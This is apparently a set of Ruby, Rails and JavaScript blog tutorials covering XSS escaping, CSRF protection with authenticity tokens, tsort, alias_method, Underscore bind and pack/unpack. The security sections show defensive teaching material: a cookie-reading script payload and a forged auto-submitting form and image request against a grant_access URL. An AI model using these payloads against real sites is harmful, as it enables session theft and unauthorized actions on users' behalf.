Next day another user, Mary, comes to the site and logs in. She is reading the same post, that post has a lot of comments, and one of the comments is the comment posted by the hacker.

The application loads all the comments including the comment posted by the hacker.

When the browser sees JavaScript code the browser executes it. And now Mary’s cookie information has been sent to hacker-site and Mary is not even aware of it.

This is a classic case of an XSS attack, and this is how the hacker can later log in as Mary just by using her cookie information.

Fixing XSS

Now that we know how a hacker might be able to execute JavaScript code on our application, the question is how do we prevent it.

Well, there is only one way to prevent it. And that is to not send the <script> tag to the browser. If we send the <script> tag to the browser then the browser will execute that JavaScript.

So what can we do so that the <script> tag is not sent to the browser?

Rails default behavior is to keep things secure

Before we start looking at solutions let’s revisit what happened earlier when we did not mark the content as html_safe. So let’s remove html_safe and let’s try to see the content posted by the hacker.

So the code without html_safe would look like this.

array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('<br />')

And if we execute this code then the hacker’s address would look like this in the browser.

John Smith<br /><script>alert(document.cookie)</script><br />Suite #110<br />Miami<br />FL<br />33027<br />USA

Notice that in this case no JavaScript alert was seen. The hacker gets to see the address the hacker had posted. Why is that? To answer that let’s look at the html markup.

John Smith&lt;br /&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;br /&gt;Suite #110&lt;br /&gt;Miami&lt;br /&gt;FL&lt;br /&gt;33027&lt;br /&gt;USA

As we can see Rails did not render the address exactly as it was posted by the hacker. Rails did something because of which <script> turned into &lt;script&gt;.

Rails html escaped the content by using the method html_escape.

By default Rails assumes that all content is not safe and thus Rails subjects all content to the html_escape method.

The problem is that here we are trying to format the content using <br /> and Rails is escaping that also. We need to escape only the user content and not escape <br />. Here is how we can do that.

array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.map{ |i| ERB::Util.html_escape(i) }.join('<br />').html_safe

In the above case we are marking the content as html_safe because we passed every piece of user content through html_escape first, and now we are sure that no unescaped user content can go through.

This will show the address in the browser like this.

[Image: the address shown in the browser]

The above solution worked. <br /> is not escaped and the user input was properly escaped.
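The escaping step can be tried outside Rails too, since ERB::Util.html_escape ships with Ruby. The sketch below uses a hypothetical format_address helper and made-up address parts; it leaves out the final html_safe call because that method comes from Rails.

```ruby
require "erb"

# Hypothetical helper: escape every user supplied part, then join with <br />.
def format_address(parts)
  parts.compact.map { |part| ERB::Util.html_escape(part) }.join("<br />")
end

# Made-up address in which the hacker has used the address1 field.
parts = ["John Smith", "<script>alert(document.cookie)</script>", nil, "Miami"]

html = format_address(parts)
puts html
```

The <br /> separators come through untouched, while the script tag arrives as &lt;script&gt;, so the browser displays it as text instead of executing it.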

Another solution using content_tag

In the above case we used html_escape and it worked. However if we need to add, say, a <strong> tag then adding the opening tag and then the closing tag could be quite cumbersome. For such cases we can use content_tag.

By default content_tag escapes the input text.

array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.map{ |i| ActionController::Base.helpers.content_tag(:strong, i) }.join('').html_safe

simple_format for simple formatting

If you want to format the text a little bit then you can use simple_format. If a user enters a bunch of text in a text area then simple_format can help make the text look pretty without compromising security. It will strip away <script> and other security sensitive tags. simple_format internally uses the sanitize method. Note that simple_format removes the script tag, while solutions like html_escape preserve the script tag in escaped form.

Handling JSON data

We use jbuilder and the view looks like this.

json.user do
  json.name @user.name
  json.address1 @user.address1
  json.address2 @user.address2
  json.city_name @user.city_name
  json.state_name @user.state_name
  json.zip @user.zip
  json.country_name @user.country_name
end

This will produce a JSON structure as shown below.

[Image: the JSON structure produced by the view]

On the client side there is JavaScript code to display the content. $('body').append(data.about) does the job. Well, when that content is added to the DOM the browser will execute the JavaScript code and now we are back to the same problem.

There are two ways we can handle this problem. We can send the data as it is in JSON format. Then it is the responsibility of the client side JavaScript code to append the data in such a way that html tags like script are not executed.

jQuery provides the text(input) method which escapes the input value. Here is an example.

[Image: example of using the jQuery text method]

In this case the entire responsibility of escaping the content rests on JavaScript. While using the data, the JavaScript code constantly needs to be aware of which content is user input and must be escaped and which content is not user input.

That is why we favor the solution where the JSON content is escaped to begin with. For escaping the content we can use the h or html_escape helper method.

json.user do
  json.name h(@user.name)
  json.address1 h(@user.address1)
  json.address2 h(@user.address2)
  json.city_name h(@user.city_name)
  json.state_name h(@user.state_name)
  json.zip h(@user.zip)
  json.country_name h(@user.country_name)
end

[Image: the JSON structure with escaped user content]

As you can see the user content is escaped. Now this data can be sent to the client side and we do not need to worry about the script tag being executed.
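The same idea can be sketched without jbuilder by using only Ruby’s standard library. The user hash below is a hypothetical stand-in for @user, and JSON.generate stands in for the jbuilder view.

```ruby
require "erb"
require "json"

# Hypothetical user record; in the view above this data comes from @user.
user = {
  "name"     => "John Smith",
  "address1" => "<script>alert(document.cookie)</script>"
}

# Escape every value before it goes into the JSON payload.
escaped = user.transform_values { |value| ERB::Util.html_escape(value) }

payload = JSON.generate({ "user" => escaped })
puts payload
```

Whatever the client side code does with address1, it now receives &lt;script&gt; rather than a live script tag.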

CSRF and Rails

CSRF stands for Cross-site request forgery. It is a technique hackers use to attack a web application.

Unlike XSS, CSRF does not try to steal your information to log into the system. CSRF assumes that you are already logged in at your site, and when you visit, say, the comments section of some other site, an attack is carried out on your site without you knowing it.

Here is how it might work.

  • You log in at www.mysite.com .
  • Now you open a new tab and you visit www.gardening.com since you are interested in gardening.
  • You are browsing the comments posted on the gardening.com forum. One of the comments contains an image tag whose source looks like this: <img src="http://www.mysite.com/grant_access?user_id=1&project_id=123" />
  • Now if you are the admin of the project “123” in www.mysite.com then you have unknowingly granted admin access to user 1. And you did not even know that you did that.

I know you are thinking that loading an image will make a GET request and granting access is hidden behind a POST request, so you are safe. Well, the hacker can easily change the code to make a POST request. In that case the code might look like this

<script>
 var url = "http://mysite.com/grant_access?user_id=1&project_id=123";
 document.write('<form name=hack method=post action='+url+'></form>')
</script>
<img src='' onLoad="document.hack.submit()" />

Now when the image is loaded a POST request is sent to the server and the application might grant access to this new user. Not good.

Prevention

In order to prevent such things from happening Rails uses authenticity_token.

If you look at the source code of any form generated by Rails you will see that the form contains the following code

<input name="authenticity_token"
       type="hidden"
       value="LhT7dqqRByvOhJJ56BsPb7jJ2p24hxNu6ZuJA+8l+YA=" />

The exact value of the authenticity_token will be different for you. When the form is submitted the authenticity_token is submitted along with it. Rails checks the authenticity_token and only when it is verified is the request passed along for further processing.

In a brand new rails application the application_controller.rb has only one line.

class ApplicationController < ActionController::Base
  protect_from_forgery
end

That line protect_from_forgery checks the authenticity of the incoming request.

Here is the code that is responsible for generating the csrf_token.

# Sets the token value for the current session.
def form_authenticity_token
  session[:_csrf_token] ||= SecureRandom.base64(32)
end

Since this csrf_token is a random value there is no way for the hacker to know what the “csrf_token” is for my session. So the hacker will not be able to pass the correct “authenticity_token”.
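Here is a rough sketch of that idea in plain Ruby. The session hash and both method names are made up for this illustration, and the check is deliberately simplified; it is not the code Rails uses for verification.

```ruby
require "securerandom"

# Hypothetical stand-in for the Rails session, which is kept per user.
session = {}

# Same idea as form_authenticity_token: create the token once per session.
def authenticity_token_for(session)
  session[:_csrf_token] ||= SecureRandom.base64(32)
end

# Simplified check for illustration. A production check should also use a
# constant-time comparison instead of ==.
def valid_authenticity_token?(session, submitted_token)
  expected = session[:_csrf_token]
  !expected.nil? && expected == submitted_token
end

token = authenticity_token_for(session)

genuine_ok = valid_authenticity_token?(session, token)            # form from our site
forged_ok  = valid_authenticity_token?(session, "guessed-token")  # forged request

puts genuine_ok
puts forged_ok
```

The form rendered by our own site carries the session’s token and passes the check, while the forged request has to guess and fails.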

Do keep in mind that Rails applies this protection only to POST, PUT and DELETE requests. Rails states that a GET request should not be changing the database in the first place, so there is no need to check the authenticity of the token for it.

Update for Rails 4

If you generate a brand new Rails application using Rails 4 then the application_controller.rb would look like this

class ApplicationController < ActionController::Base
  # Prevent CSRF attacks by raising an exception.
  # For APIs, you may want to use :null_session instead.
  protect_from_forgery with: :exception
end

Now the default is to raise an exception if the token does not match. API calls will not have the token. If the application is expecting API calls then the strategy should be changed from :exception to :null_session.

Note that if the site is vulnerable to XSS then the hacker can submit requests as if he were the logged-in user, and in that case the CSRF attack will go through.

tsort in ruby and rails initializers

You have been assigned the task of figuring out in what order the following tasks should be executed given their dependencies on other tasks.

Task11 takes input from task5 and task2.
Task10 takes input from task11 and task3.
Task9 takes input from task8 and task11.
Task8 takes input from task3 and task7.

If you look at these tasks and draw a graph then it might look like this.

[Image: directed acyclic graph]

Directed acyclic graph

The graph shown above is a “Directed acyclic graph”. In a directed acyclic graph, if you start following the arrows you should never be able to get back to the node from where you started.

Directed acyclic graphs are great at describing problems where a task is dependent on another set of tasks.

We started off with a set of tasks that are dependent on another set of tasks. To get the solution we need to sort the tasks in such a way that the first task is not dependent on any task and each following task is dependent only on tasks that are already done. So basically we need to sort the directed acyclic graph such that the prerequisites are done before getting to the next task.

Sorting a directed acyclic graph in the manner described above is called topological sorting.

TSort

Ruby provides TSort which allows us to implement “topological sorting”. Here is the source code of tsort.

Let’s write code to find the solution to the original problem.

require "tsort"

class Project
  include TSort

  def initialize
    @requirements = Hash.new{|h,k| h[k] = []}
  end

  def add_requirement(name, *requirement_dependencies)
    @requirements[name] = requirement_dependencies
  end

  def tsort_each_node(&block)
    @requirements.each_key(&block)
  end

  def tsort_each_child(name, &block)
    @requirements[name].each(&block) if @requirements.has_key?(name)
  end

end

p = Project.new
p.add_requirement(:r11, :r5, :r2)
p.add_requirement(:r10, :r11, :r3)
p.add_requirement(:r9, :r8, :r11)
p.add_requirement(:r8, :r3, :r7)

puts p.tsort

If I execute the above code in ruby 1.9.2 I get the following result.

r5
r2
r11
r3
r10
r7
r8
r9

So that is the order in which the tasks should be executed.

How Tsort works

tsort requires that the following two methods be implemented.

#tsort_each_node - as the name suggests it is used to iterate over all the nodes in the graph. In the above example all the requirements are stored as hash keys. So to iterate over all the nodes we need to go through all the hash keys. And that can be done using the #each_key method of hash.

#tsort_each_child - this method is used to iterate over all the child nodes of the given node. In this graph the child nodes of a node are its dependencies. We stored all the dependencies of a requirement as an array. So to get the list of all the dependencies for a node all we need to do is @requirements[name].each.
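The same two hooks can also be passed as lambdas to the module-level TSort.tsort method, which is available in newer Ruby versions (2.1 and later). The sketch below reuses the dependencies from the Project example; the cyclic variant at the end is a made-up addition to show what happens when the graph is not acyclic.

```ruby
require "tsort"

# Same dependencies as the Project example: each key depends on its values.
requirements = {
  r11: [:r5, :r2],
  r10: [:r11, :r3],
  r9:  [:r8, :r11],
  r8:  [:r3, :r7]
}

# Counterparts of tsort_each_node and tsort_each_child.
each_node  = lambda { |&block| requirements.each_key(&block) }
each_child = lambda { |name, &block| requirements.fetch(name, []).each(&block) }

order = TSort.tsort(each_node, each_child)
p order

# Hypothetical cycle: r5 now depends on r11, which already depends on r5.
cyclic = requirements.merge(r5: [:r11])
cyclic_nodes    = lambda { |&block| cyclic.each_key(&block) }
cyclic_children = lambda { |name, &block| cyclic.fetch(name, []).each(&block) }

cycle_detected = begin
  TSort.tsort(cyclic_nodes, cyclic_children)
  false
rescue TSort::Cyclic
  true
end

puts cycle_detected
```

The first call prints the same order as the Project class above. The second call cannot produce an order at all, so tsort raises TSort::Cyclic instead of returning a result.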

Another example

To make things clearer let’s try to solve the same problem in a different way.

require "tsort"

class Project
  attr_accessor :dependents, :name
  def initialize(name)
    @name = name
    @dependents = []
  end
end

class Sorter
  include TSort

  def initialize(col)
    @col = col
  end

  def tsort_each_node(&block)
    @col.each(&block)
  end

  def tsort_each_child(project, &block)
    @col.select { |i| i.name == project.name }.first.dependents.each(&block)
  end
end

r5 = Project.new :r5
r2 = Project.new :r2

r11 = Project.new :r11
r11.dependents << r5
r11.dependents << r2

r3 = Project.new :r3
r10 = Project.new :r10
r10.dependents << r11
r10.dependents << r3

r8 = Project.new :r8
r9 = Project.new :r9
r9.dependents << r8
r9.dependents << r11

r7 = Project.new :r7
r8.dependents << r3
r8.dependents << r7

col = [r5, r2, r11, r3, r10, r9, r7, r8]

result = Sorter.new(col).tsort
puts result.map(&:name).inspect

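When I execute the above code this is the result I get

[:r5, :r2, :r11, :r3, :r10, :r7, :r8, :r9]

If you look at the code, I am doing exactly the same thing here as in the first case. The only difference is that the dependencies now live on the Project objects instead of in a hash.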

Using before and after option

Let’s try to solve the same problem one last time using before and after options. Here is the code.

require "tsort"

class Project
  attr_accessor :before, :after, :name
  def initialize(name, options = {})
    @name = name
    @before, @after = options[:before], options[:after]
  end
end

class Sorter
  include TSort

  def initialize(col)
    @col = col
  end

  def tsort_each_node(&block)
    @col.each(&block)
  end

  def tsort_each_child(project, &block)
    @col.select { |i| i.before == project.name || i.name == project.after }.each(&block)
  end
end

r11 = Project.new :r11
r7 = Project.new :r7
r9 = Project.new :r9
r5 = Project.new :r5
r2 = Project.new :r2, after: :r5, before: :r11
r3 = Project.new :r3, after: :r11
r8 = Project.new :r8, after: :r7, before: :r9
r10 = Project.new :r10, before: :r7

col = [r5, r2, r11, r3, r10, r9, r7, r8]

result = Sorter.new(col).tsort
puts result.map(&:name).inspect

Here is the result.

[:r5, :r2, :r11, :r3, :r10, :r7, :r8, :r9]

Sorting of rails initializer

If you have written a Rails plugin then you can use code like this

initializer 'my_plugin_initializer', after: 'to_prepare', before: 'before_eager_load' do |app|
 ....
end

The way Rails figures out the exact order in which initializers should be executed is exactly the same as I illustrated above. Here is the code from Rails.

alias :tsort_each_node :each
def tsort_each_child(initializer, &block)
  select { |i| i.before == initializer.name || i.name == initializer.after }.each(&block)
end
............
............
initializers.tsort.each do |initializer|
  initializer.run(*args) if initializer.belongs_to?(group)
end

When Rails boots it invokes a lot of initializers. Rails uses tsort to get the order in which the initializers should be invoked. Here is the list of unsorted initializers. After sorting the initializers list is this.

Where else it is used

Bundler uses tsort to find the order in which gems should be installed.

Tsort can also be used to statically analyze programming code by looking at the method dependency graph.

Image source: http://en.wikipedia.org/wiki/Directed_acyclic_graph

alias vs alias_method

It comes up very often. Should I use alias or alias_method? Let’s take a look at them in a bit of detail.

Usage of alias

class User

  def full_name
    puts "Johnnie Walker"
  end

  alias name full_name
end

User.new.name #=>Johnnie Walker

Usage of alias_method

class User

  def full_name
    puts "Johnnie Walker"
  end

  alias_method :name, :full_name
end

User.new.name #=>Johnnie Walker

The first difference you will notice is that in the case of alias_method we need to use a comma between the “new method name” and the “old method name”.

alias_method takes both symbols and strings as input. The following code would also work.

alias_method 'name', 'full_name'

That was easy. Now let’s take a look at how scoping impacts the usage of alias and alias_method.

Scoping with alias

class User

  def full_name
    puts "Johnnie Walker"
  end

  def self.add_rename
    alias_method :name, :full_name
  end
end

class Developer < User
  def full_name
    puts "Geeky geek"
  end
  add_rename
end

Developer.new.name #=> 'Geeky geek'

In the above case the method “name” picks the method “full_name” defined in the “Developer” class. Now let’s try with alias.

class User

  def full_name
    puts "Johnnie Walker"
  end

  def self.add_rename
    alias :name :full_name
  end
end

class Developer < User
  def full_name
    puts "Geeky geek"
  end
  add_rename
end

Developer.new.name #=> 'Johnnie Walker'

With the usage of alias the method “name” is not able to pick the method “full_name” defined in Developer.

This is because alias is a keyword and it is lexically scoped. It means it treats self as the value of self at the time the source code was read. In contrast alias_method treats self as the value determined at run time.
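Both behaviours can be seen side by side in one small script. This is only a sketch: the method names rename_with_keyword, rename_with_method, name_via_alias and name_via_alias_method are invented for the comparison, and the methods return strings instead of calling puts so the results are easy to compare.

```ruby
class User
  def full_name
    "Johnnie Walker"
  end

  # alias is a keyword: it is resolved against User, the class in which
  # this line of source code appears.
  def self.rename_with_keyword
    alias name_via_alias full_name
  end

  # alias_method is a method call: it is resolved against self at run time,
  # which is whichever class calls rename_with_method.
  def self.rename_with_method
    alias_method :name_via_alias_method, :full_name
  end
end

class Developer < User
  def full_name
    "Geeky geek"
  end

  rename_with_keyword
  rename_with_method
end

developer = Developer.new
puts developer.name_via_alias
puts developer.name_via_alias_method
```

The keyword version prints Johnnie Walker because the alias was created on User, while the alias_method version prints Geeky geek because the alias was created on Developer.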

Overall my recommendation would be to use alias_method. Since alias_method is a method defined in the class Module, it can be overridden later and it offers more flexibility.

Understanding bind and bindAll in Backbone.js

Backbone.js users use the bind and bindAll methods provided by underscore.js a lot. In this blog I am going to discuss why these methods are needed and how it all works.

It all starts with apply

Function bindAll internally uses bind. And bind internally uses apply. So it is important to understand what apply does.

var func = function beautiful(){
  alert(this + ' is beautiful');
};
func();

If I execute the above code then I get [object Window] is beautiful. I am getting that message because when the function is invoked this is window, the default global object.

In order to change the value of this we can make use of the method apply as given below.

var func = function beautiful(){
  alert(this + ' is beautiful');
};
func.apply('Internet');

In the above case the alert message will be Internet is beautiful. Similarly the following code will produce Beach is beautiful.

var func = function beautiful(){
  alert(this + ' is beautiful');
};
func.apply('Beach'); //Beach is beautiful

In short, apply lets us control the value of this when the function is invoked.

Why bind is needed

In order to understand why the bind method is needed let’s first look at the following example.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
john.says(); //Ruby rocks!

The above example is pretty straightforward. john is an instance of Developer and when the says function is invoked we get the right alert message.

Notice that when we invoked says we invoked it like this: john.says(). If we just want to get hold of the function stored in says then we need to do john.says. So the above code could be broken down into the following code.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
var func = john.says;
func();// undefined rocks!

The above code is similar to the code before it. All we have done is store the function in a variable called func. We might expect that invoking this function gives us the same alert message as before. However if we run this code the alert message will be undefined rocks!.

We are getting undefined rocks! because in this case func is being invoked in the global context. this is pointing to the global object called window when the function is executed. And window does not have any attribute called skill. Hence the output of this.skill is undefined.

Earlier we saw that using apply we can fix the problem arising out of this. So let’s try to use apply to fix it.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
var func = john.says;
func.apply(john);

The above code fixes our problem. This time the alert message we got was Ruby rocks!. However there is an issue and it is a big one.

In the JavaScript world functions are first class citizens. The reason why we create a function is so that we can easily pass it around. In the above case we created a function called func. However along with the function func we now need to keep passing john around. That is not a good thing. Secondly, the responsibility of rightly invoking this function has been shifted from the function creator to the function consumer. That’s not a good API.

We should try to create functions which can easily be called by the consumers of the function. This is where bind comes in.

How bind solves the problem

First let’s see how using bind solves the problem.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
var func = _.bind(john.says, john);
func();// Ruby rocks!

To solve the problem with this we need a function that is already mapped to john so that we do not need to keep carrying john around. That’s precisely what bind does. It returns a new function and this new function has this bound to the value that we provide.

Here is a snippet of code from the bind method

return function() {
  return func.apply(obj, args.concat(slice.call(arguments)));
};

As you can see bind internally uses apply to set this to the second parameter we passed while invoking bind.

Notice that bind does not change the existing function. It returns a new function and that new function should be used.

How bindAll solves the problem

Instead of bind we can also use bindAll. Here is the solution with bindAll.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
_.bindAll(john, 'says');
var func = john.says;
func(); //Ruby rocks!

The above code is similar to the bind solution but there are some big differences.

The first big difference is that we do not have to worry about the returned value of bindAll. In the case of bind we must use the returned function. In bindAll we do not have to worry about the returned value but it comes with a price. bindAll actually mutates the object. What does that mean?

See, the john object has an attribute called says which holds a function. bindAll goes and replaces the attribute says with a function that is already bound to john.

Here is a snippet of code from the bindAll method.

function(f) { obj[f] = _.bind(obj[f], obj); }

Notice that bindAll internally calls bind and it overrides the existing attribute with the function returned by bind.

The other difference between bind and bindAll is the order and type of the parameters. In bind the first parameter is a function, john.says, and the second parameter is the value of this, john. In bindAll the first parameter is the value of this, john, and the second parameter is not a function but the attribute name.

Things to watch out for

While developing a Backbone.js application someone had code like this

window.ProductView = Backbone.View.extend({
  initialize: function() {
    _.bind(this.render, this);
    this.model.bind('change', this.render);
  }
});

The above code will not work because the returned value of bind is not being used. The correct usage will be

window.ProductView = Backbone.View.extend({
  initialize: function() {
    this.model.bind('change', _.bind(this.render, this));
  }
});

Or you can use bindAll as given below.

window.ProductView = Backbone.View.extend({
  initialize: function() {
    _.bindAll(this, 'render');
    this.model.bind('change', this.render);
  }
});


Ruby pack unpack

The C programming language allows developers to directly access the memory where variables are stored. Ruby does not allow that. There are times while working in Ruby when you need to access the underlying bits and bytes. Ruby provides two methods, pack and unpack, for that.

Here is an example.

> 'A'.unpack('b*')
=> ["10000010"]

In the above case ‘A’ is a string which is being stored and using unpack I am trying to read the bit value. The ASCII table says that the ASCII value of ‘A’ is 65, and the binary representation of 65 is 01000001. The result above, 10000010, contains the same bits in the reverse order.

Here is another example.

> 'A'.unpack('B*')
=> ["01000001"]

Notice the difference in the result from the first case. What’s the difference between b* and B*? In order to understand the difference let’s first discuss MSB and LSB.

Most significant bit vs Least significant bit

Not all bits are created equal. C has an ASCII value of 67. The binary value of 67 is 1000011.

First let’s discuss the MSB (most significant bit) style. If you are following the MSB style then, going from left to right (and you always go from left to right), the most significant bit comes first. Because the most significant bit comes first we can pad an additional zero to the left to make the number of bits eight. After adding an additional zero to the left the binary value looks like 01000011.

If we want to convert this value to the LSB (least significant bit) style then we need to store the least significant bit first going from left to right. Given below is how the bits will be moved if we are converting from MSB to LSB. Note that in the case below position 1 refers to the leftmost bit.

move value 1 from position 8 of MSB to position 1 of LSB
move value 1 from position 7 of MSB to position 2 of LSB
move value 0 from position 6 of MSB to position 3 of LSB
and so on and so forth

After the exercise is over the value will look like 11000010.

We did this exercise manually to understand the difference between most significant bit and least significant bit. However the unpack method can directly give the result in both MSB and LSB styles. The unpack method can take both b* and B* as the input. As per the ruby documentation here is the difference.

B | bit string (MSB first)
b | bit string (LSB first)

Now let’s take a look at two examples.

> 'C'.unpack('b*')
=> ["11000010"]

> 'C'.unpack('B*')
=> ["01000011"]

Both b* and B* are looking at the same underlying data. It’s just that they represent the data differently.
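The manual exercise can be checked in Ruby itself. In this short sketch unpack1 (available in newer Ruby versions) returns the first unpacked value directly, and the variable names are just for illustration.

```ruby
byte = 'C'.ord                           # 67

# MSB first: plain binary, padded on the left to eight bits.
msb_first = byte.to_s(2).rjust(8, '0')   # "01000011"

# LSB first: the same eight bits read in the opposite direction.
lsb_first = msb_first.reverse            # "11000010"

puts msb_first == 'C'.unpack1('B*')
puts lsb_first == 'C'.unpack1('b*')
```

Both comparisons print true. Note that the reversal happens within each byte, so for a longer string each group of eight bits is reversed on its own.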

Different ways of getting the same data

Let’s say that I want the binary value for the string hello. Based on the discussion in the last section that should be easy now.

> "hello".unpack('B*')
=> ["0110100001100101011011000110110001101111"]

The same information can also be derived as

> "hello".unpack('C*').map {|e| e.to_s 2}
=> ["1101000", "1100101", "1101100", "1101100", "1101111"]

Let’s break down the previous statement in small steps.

> "hello".unpack('C*')
=> [104, 101, 108, 108, 111]

Directive C* gives the 8-bit unsigned integer value of each character. Note that the ASCII value of h is 104, the ASCII value of e is 101 and so on.

Using the technique discussed above I can find the hex value of the string.

> "hello".unpack('C*').map {|e| e.to_s 16}
=> ["68", "65", "6c", "6c", "6f"]

Hex value can also be achieved directly.

> "hello".unpack('H*')
=> ["68656c6c6f"]

High nibble first vs Low nibble first

Notice the difference in the below two cases.

> "hello".unpack('H*')
=> ["68656c6c6f"]

> "hello".unpack('h*')
=> ["8656c6c6f6"]

As per ruby documentation for unpack

H | hex string (high nibble first)
h | hex string (low nibble first)

A byte consists of 8 bits. A nibble consists of 4 bits. So a byte has two nibbles. The ASCII value of ‘h’ is 104. The hex value of 104 is 68. This 68 is stored in two nibbles. The first nibble, meaning the upper 4 bits, contains the value 6 and the second nibble contains the value 8. In general we deal with the high nibble first, so going from left to right we pick the value 6 and then 8.

However, if you are dealing with the low nibble first then the low nibble value 8 takes the first slot and 6 comes second. Hence the result in “low nibble first” mode is 86.

This pattern is repeated for each byte. And because of that a hex value of 68 65 6c 6c 6f looks like 86 56 c6 c6 f6 in low nibble first format.
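The nibble swap can be reproduced by hand. The sketch below takes the H* output and swaps the two hex digits of every byte; swap_nibbles is a made-up helper name for this illustration.

```ruby
# Hypothetical helper: swaps the two hex digits (nibbles) of each byte
# in a hex string.
def swap_nibbles(hex)
  hex.scan(/../).map { |pair| pair.reverse }.join
end

high_first = "hello".unpack('H*').first
low_first  = "hello".unpack('h*').first

puts swap_nibbles(high_first)
puts swap_nibbles(high_first) == low_first
```

The comparison should print true, which is the per-byte pattern described above.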

Mix and match directives

In all the previous examples I used *. A * means to keep going as long as there is data left to consume. Let’s see a few examples.

A single C will get a single byte.

> "hello".unpack('C')
=> [104]

You can add more Cs if you like.

> "hello".unpack('CC')
=> [104, 101]

> "hello".unpack('CCC')
=> [104, 101, 108]

> "hello".unpack('CCCCC')
=> [104, 101, 108, 108, 111]

Rather than repeating all those directives, I can add a number to denote how many times the previous directive should be repeated.

> "hello".unpack('C5')
=> [104, 101, 108, 108, 111]

I can use * to capture all the remaining bytes.

> "hello".unpack('C*')
=> [104, 101, 108, 108, 111]

Below is an example where MSB and LSB are being mixed.

> "aa".unpack('b8B8')
=> ["10000110", "01100001"]
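Different kinds of directives can be combined in one format string as well. The following sketch reads the first three bytes of "hello" in three different ways; the method name first_three is invented for the example.

```ruby
# Hypothetical helper: reads byte 1 as an integer (C), byte 2 as two
# hex digits (H2) and byte 3 as eight bits, MSB first (B8).
def first_three(str)
  str.unpack('CH2B8')
end

p first_three("hello")
# Each directive consumes one byte here: 'h', then 'e', then 'l'.
```

Each directive picks up where the previous one stopped, so the order of the directives decides which byte is decoded in which way.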

pack is the reverse of unpack

While unpack reads binary data out of a string, the pack method takes an array of values and writes them into a binary string. Let’s discuss a few examples.

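> [0b1000001].pack('C')
=> "A"

In the above case the binary literal 0b1000001 (decimal 65) is packed as an 8-bit unsigned integer and the result is ‘A’. Without the 0b prefix Ruby would read 1000001 as a decimal number. pack('C') keeps only the lowest 8 bits, and 1000001 modulo 256 also happens to be 65, so the result would be the same purely by coincidence.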
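To see that pack really undoes unpack, here is a minimal round-trip sketch. The method name round_trip is an assumption made for this example.

```ruby
# Hypothetical helper: unpacks a string with the given directive and
# packs the result straight back with the same directive.
def round_trip(str, directive)
  str.unpack(directive).pack(directive)
end

puts round_trip("hello", 'C*') == "hello"
puts round_trip("hello", 'H*') == "hello"
puts round_trip("hello", 'b*') == "hello"
```

All three lines should print true. The packed string comes back with a binary encoding, but for plain ASCII content it still compares equal to the original.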

> ['A'].pack('H')
=> "\xA0"

In the above case the input ‘A’ is not ASCII ‘A’ but the hex digit ‘A’. Why is it hex ‘A’? Because the directive ‘H’ tells pack to treat the input as a hex value. Since ‘H’ is high nibble first and the input has only one nibble, the second nibble is zero. So the input effectively changes from ['A'] to ['A0'].

Since the hex value A0 does not correspond to anything in the ASCII table, the final output is left as is and hence the result is \xA0. The leading \x indicates that the byte is shown in hexadecimal.

Notice that in hex notation A is the same as a. So in the above example I can replace A with a and the result should not change. Let’s try that.

> ['a'].pack('H')
=> "\xA0"

Let’s discuss another example.

> ['a'].pack('h')
=> "\n"

In the above example notice the change. I changed the directive from H to h. Since h means low nibble first and the input has only one nibble, the input value is treated as the low nibble and the missing high nibble becomes zero. That means the value changes from ['a'] to ['0a'] in the usual notation, and the output is \x0A. If you look at the ASCII table, hex value A is decimal 10, which is NL (line feed, new line). Hence we see \n as the output.
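The zero padding can be checked by looking at the resulting byte as a number. This is a small sketch, and packed_byte is a hypothetical helper name.

```ruby
# Hypothetical helper: packs a hex string with the given directive and
# returns the first resulting byte as an integer.
def packed_byte(hex, directive)
  [hex].pack(directive).unpack('C').first
end

puts packed_byte('a', 'H').to_s(16)   # single nibble, high nibble first
puts packed_byte('a', 'h').to_s(16)   # single nibble, low nibble first

# Spelling out both nibbles gives the same bytes as the padded versions.
puts packed_byte('a0', 'H2') == packed_byte('a', 'H')
puts packed_byte('a0', 'h2') == packed_byte('a', 'h')
```

With H the single digit ends up in the upper half of the byte, and with h it ends up in the lower half.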

Usage of unpack in Rails source code

I did a quick grep in the Rails source code and found the following usages of unpack.

email_address_obfuscated.unpack('C*')
'mailto:'.unpack('C*')
email_address.unpack('C*')
char.unpack('H2')
column.class.string_to_binary(value).unpack("H*")
data.unpack("m")
s.unpack("U*")

We have already seen the directives C* and H for unpack. The directive m decodes Base64-encoded data, and the directive U* gives the Unicode code point of each UTF-8 character. Here is an example.

> "Hello".unpack('U*')
=> [72, 101, 108, 108, 111]
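For plain ASCII text U* and C* return the same numbers, so the difference only shows up with non-ASCII characters. The sketch below uses the character é (written as "\u00e9") and also includes a Base64 round trip with m. The method names code_points, raw_bytes and base64_decode are made up for this example.

```ruby
# Hypothetical helpers, named only for this illustration.
def code_points(str)
  str.unpack('U*')   # one number per UTF-8 character
end

def raw_bytes(str)
  str.unpack('C*')   # one number per byte
end

def base64_decode(encoded)
  encoded.unpack('m').first
end

p code_points("\u00e9")   # one code point
p raw_bytes("\u00e9")     # two bytes in UTF-8

encoded = ["hello"].pack('m')   # pack with m encodes to Base64
puts base64_decode(encoded) == "hello"
```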

Testing environment

The above code was tested with Ruby 1.9.2.

A French version of this article is available here.